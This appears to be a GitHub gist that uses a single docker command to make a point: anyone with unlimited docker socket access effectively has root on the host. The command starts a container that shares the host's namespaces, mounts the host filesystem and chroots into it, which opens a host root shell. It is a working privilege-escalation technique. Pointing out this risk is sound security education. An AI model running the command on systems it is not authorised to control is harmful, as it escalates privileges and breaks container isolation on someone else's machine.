Skip to content

Instantly share code, notes, and snippets.

@iavael
Last active January 8, 2022 21:31
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save iavael/f5ec366b047b50beac7885f3d34d7058 to your computer and use it in GitHub Desktop.
Save iavael/f5ec366b047b50beac7885f3d34d7058 to your computer and use it in GitHub Desktop.
Everything you need to know about compatibility of security with unlimited access to docker socket
docker run -it --rm --uts=host --pid=host --net=host --userns=host -v /:/tmp/root busybox chroot /tmp/root sh -l
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment